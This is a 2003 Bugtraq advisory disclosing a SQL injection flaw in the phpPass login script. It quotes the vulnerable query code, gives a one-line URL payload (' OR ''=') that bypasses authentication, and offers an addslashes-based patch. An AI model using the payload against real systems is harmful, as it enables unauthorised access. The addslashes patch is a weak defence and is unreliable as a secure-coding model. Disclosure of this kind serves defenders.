Bugtraq mailing list archives
phpPass (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 13 Jan 2003 11:34:27 +0100
Informations : °°°°°°°°°°°°°° Version : 2 Website : http://www.agames-net.com Problem : SQL Injection PHP Code/Location : °°°°°°°°°°°°°°°°°°° accesscontrol.php : ------------------------------------------------ [...] session_register("uid"); session_register("pwd"); [...] $sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'"; $result = mysql_query($sql); [...] if (mysql_num_rows($result) == 0) { session_unregister("uid"); session_unregister("pwd"); ?> <html> <head> <title> Access Denied </title> [...] exit; [...] ------------------------------------------------ Exploit : °°°°°°°°° http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' Patch : °°°°°°° In accesscontrol.php, replace the lines : ------------------------------------------------- $sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'"; $result = mysql_query($sql); ------------------------------------------------ by : ------------------------------------------------------------------------ $uid=addslashes($uid); $pwd=addslashes($pwd); $sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'"; $result = mysql_query($sql); ------------------------------------------------------------------------ A patch can be found on http://www.phpsecure.org . More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/phpPass.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Current thread:
- phpPass (PHP) Frog Man (Jan 20)